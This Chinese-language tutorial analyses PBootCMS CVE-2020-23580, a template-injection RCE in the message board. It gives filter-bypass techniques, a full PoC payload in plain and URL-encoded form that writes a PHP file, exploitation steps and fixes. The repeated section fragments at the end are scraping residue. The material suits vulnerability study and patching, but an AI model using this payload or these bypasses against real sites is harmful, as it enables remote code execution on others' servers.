PBootCMS CVE-2020-23580 安全漏洞分析与利用教学<\/h1>

一、漏洞概述<\/h2>
漏洞编号<\/strong>: CVE-2020-23580
影响版本<\/strong>: PBootCMS 2.0.7 (官方标注为2.0.8但实际影响2.0.7)
漏洞类型<\/strong>: 远程代码执行(RCE)
漏洞位置<\/strong>: 留言板(message board)功能
漏洞成因<\/strong>: 未对用户输入做有效验证导致模板标签解析时可能执行恶意代码<\/p>

二、环境搭建<\/h2>
1. 下载源码<\/h3>
从码云(Gitee)下载PBootCMS 2.0.7版本源码<\/p>
2. 数据库配置<\/h3>
默认使用SQLite数据库，如需使用MySQL：<\/p>

创建数据库：<\/li> <\/ol>
mysql -<\/span>u root -<\/span>p <\/span><\/span>create<\/span> database<\/span> pb; <\/span><\/span>use pb; <\/span><\/span>source<\/span> ...\<\/span>PbootCMS-<\/span>V2.0<\/span>.8<\/span>\<\/span>static<\/span>\<\/span>backup\<\/span>sql<\/span>\<\/span>xxx.sql<\/span> <\/span><\/span><\/code><\/pre> 修改配置文件config\/database.php<\/code>：<\/li> <\/ol> 'type'<\/span> =><\/span> 'mysql'<\/span>, \/\/ 从sqlite改为mysql <\/span><\/span><\/span><\/span>'hostname'<\/span> =><\/span> 'localhost'<\/span>, <\/span><\/span>'database'<\/span> =><\/span> 'pb'<\/span>, <\/span><\/span>'username'<\/span> =><\/span> 'root'<\/span>, <\/span><\/span>'password'<\/span> =><\/span> 'yourpassword'<\/span>, <\/span><\/span><\/code><\/pre>3. 访问安装<\/h3> 配置完成后访问网站首页完成安装<\/p> 三、漏洞分析<\/h2> 1. 核心差异点<\/h3> 比较2.0.7和2.0.8版本，关键差异在MessageController.php<\/code>和ParserController.php<\/code>中：<\/p> 2.0.7版本<\/strong>使用str_replace('pboot:if', '', $field_data)<\/code><\/li> 2.0.8版本<\/strong>使用递归替换函数preg_replace_r()<\/code><\/li> <\/ul> function<\/span> preg_replace_r<\/span>($search, $replace, $subject) { <\/span><\/span> while<\/span> (preg_match<\/span>($search, $subject)) { <\/span><\/span> $subject =<\/span> preg_replace<\/span>($search, $replace, $subject); <\/span><\/span> } <\/span><\/span> return<\/span> $subject; <\/span><\/span>} <\/span><\/span><\/code><\/pre>2. 攻击链分析<\/h3> 攻击者在留言板提交包含恶意{pboot:if}标签的内容<\/li> 管理员在后台将该留言设置为"可显示"<\/li> 当用户访问留言板页面时，系统解析模板标签<\/li> 恶意代码通过eval()<\/code>执行<\/li> <\/ol> 3. 关键代码路径<\/h3> 留言提交处理<\/strong>: apps\/home\/controller\/MessageController.php<\/code><\/li> 标签解析执行<\/strong>: apps\/home\/controller\/ParserController.php<\/code>中的parserIfLabel()<\/code>函数<\/li> <\/ul> \/\/ ParserController.php中的关键代码 <\/span><\/span><\/span><\/span>function<\/span> parserIfLabel<\/span>($content) { <\/span><\/span> $pattern =<\/span> '\/\{pboot:if([\s\S]*?)\}\}([\s\S]*?)\{\\/pboot:if\}\/'<\/span>; <\/span><\/span> if<\/span> (preg_match_all<\/span>($pattern, $content, $matches)) { <\/span><\/span> \/\/ ...安全检查... <\/span><\/span><\/span><\/span> eval<\/span>('if('<\/span>.<\/span>$matches[1<\/span>][$i].<\/span>'){$flag="if";}else{$flag="else";}'<\/span>); <\/span><\/span> } <\/span><\/span> return<\/span> $content; <\/span><\/span>} <\/span><\/span><\/code><\/pre>四、漏洞利用<\/h2> 1. 绕过str_replace过滤<\/h3> 使用双写绕过：<\/p> {pbootpboot:if:if(恶意代码)}内容{\/pbootpboot:if:if} <\/code><\/pre> 经过一次替换后变为合法标签：<\/p> {pboot:if(恶意代码)}内容{\/pboot:if} <\/code><\/pre> 2. 绕过安全检查<\/h3> ParserController中有两重安全检查：<\/p> 第一重检查<\/strong>：检测危险函数<\/p> if<\/span> ((function_exists<\/span>($value) ||<\/span> preg_match<\/span>('\/^eval$\/i'<\/span>, $value)) <\/span><\/span> &&<\/span> !<\/span>in_array<\/span>($value, $white_fun)) { <\/span><\/span> $danger =<\/span> 1<\/span>; <\/span><\/span> break<\/span>; <\/span><\/span>} <\/span><\/span><\/code><\/pre>绕过方法：在函数名和括号之间插入控制字符(\x00-\x20)<\/p> fopen\x01("info.php","w") <\/code><\/pre> 第二重检查<\/strong>：黑名单过滤<\/p> \/\/ 过滤的特殊字符串 <\/span><\/span><\/span><\/span>(\<\/span>$_GET\[)|<\/span>(\<\/span>$_POST\[)|<\/span>(\<\/span>$_REQUEST\[)|<\/span>(\<\/span>$_COOKIE\[)|<\/span>(\<\/span>$_SESSION\[)|<\/span> <\/span><\/span>(file_put_contents<\/span>)|<\/span>(fwrite<\/span>)|<\/span>(phpinfo<\/span>)|<\/span>(base64_decode<\/span>)|<\/span>(`<\/span>)|<\/span> <\/span><\/span>(shell_exec<\/span>)|<\/span>(eval<\/span>)|<\/span>(system<\/span>)|<\/span>(exec<\/span>)|<\/span>(passthru<\/span>) <\/span><\/span><\/code><\/pre>绕过方法：<\/p> 使用未被过滤的函数组合：fputs(fopen())<\/code><\/li> 使用chr()<\/code>拼接敏感字符串<\/li> <\/ol> 3. 完整利用POC<\/h3> {pbootpbootpboot<\/span>:<\/span>if<\/span>:<\/span>if<\/span>:<\/span>if<\/span>(fputs<\/span>%<\/span>01<\/span>(fopen<\/span>%<\/span>01<\/span>("info.php"<\/span>,"w"<\/span>),"<?php "<\/span>.<\/span>chr<\/span>%<\/span>01<\/span>(112<\/span>).<\/span>chr<\/span>%<\/span>01<\/span>(104<\/span>).<\/span>chr<\/span>%<\/span>01<\/span>(112<\/span>).<\/span>chr<\/span>%<\/span>01<\/span>(105<\/span>).<\/span>chr<\/span>%<\/span>01<\/span>(110<\/span>).<\/span>chr<\/span>%<\/span>01<\/span>(102<\/span>).<\/span>chr<\/span>%<\/span>01<\/span>(111<\/span>).%<\/span>01.<\/span>"();?>"<\/span>))}yyy<\/span>{\/<\/span>pbootpbootpboot<\/span>:<\/span>if<\/span>:<\/span>if<\/span>:<\/span>if<\/span>} <\/span><\/span><\/code><\/pre>URL编码后：<\/p> %7Bpbootpbootpboot%3Aif%3Aif%3Aif%28fputs%01%28fopen%01%28%22info.php%22%2C%22w%22%29%2C%22%3C%3Fphp+%22.chr%01%28112%29.chr%01%28104%29.chr%01%28112%29.chr%01%28105%29.chr%01%28110%29.chr%01%28102%29.chr%01%28111%29%01.%22%28%29%3B%3F%3E%22%29%29%7Dyyy%7B%2Fpbootpbootpboot%3Aif%3Aif%3Aif%7D <\/code><\/pre> 4. 利用步骤<\/h3> 在留言板提交上述恶意payload<\/li> 管理员登录后台，将该留言设置为"可显示"<\/li> 访问\/info.php<\/code>即可看到phpinfo页面<\/li> <\/ol> 五、修复方案<\/h2> 升级到最新版本(PBootCMS 2.0.8及以上)<\/li> 临时修复方案：修改MessageController.php<\/code>，使用preg_replace_r()<\/code>替代str_replace()<\/code><\/li> 加强parserIfLabel()<\/code>函数中的过滤逻辑<\/li> <\/ul> <\/li> <\/ol> 六、技术要点总结<\/h2> 双写绕过<\/strong>：利用str_replace<\/code>非递归替换特性<\/li> 控制字符绕过<\/strong>：在函数名和括号间插入\x00-\x20字符<\/li> 函数组合利用<\/strong>：使用未被完全过滤的函数组合实现恶意功能<\/li> chr编码绕过<\/strong>：拼接敏感字符串避免直接出现黑名单内容<\/li> <\/ol> 七、参考链接<\/h2> 动态调用和Webshell技巧 - 离别歌<\/a><\/li> PBootCMS官方更新日志<\/li> <\/ol>

PBootCMS CVE-2020-23580 安全漏洞分析与利用教学<\/h1>

1. 下载源码<\/h3> 从码云(Gitee)下载PBootCMS 2.0.7版本源码<\/p>

3. 访问安装<\/h3> 配置完成后访问网站首页完成安装<\/p>

三、漏洞分析<\/h2>

四、漏洞利用<\/h2>

七、参考链接<\/h2> 动态调用和Webshell技巧 - 离别歌<\/a><\/li> PBootCMS官方更新日志<\/li> <\/ol>

1. 下载源码<\/h3>
从码云(Gitee)下载PBootCMS 2.0.7版本源码<\/p>

3. 访问安装<\/h3>
配置完成后访问网站首页完成安装<\/p>

七、参考链接<\/h2>

动态调用和Webshell技巧 - 离别歌<\/a><\/li>
PBootCMS官方更新日志<\/li> <\/ol>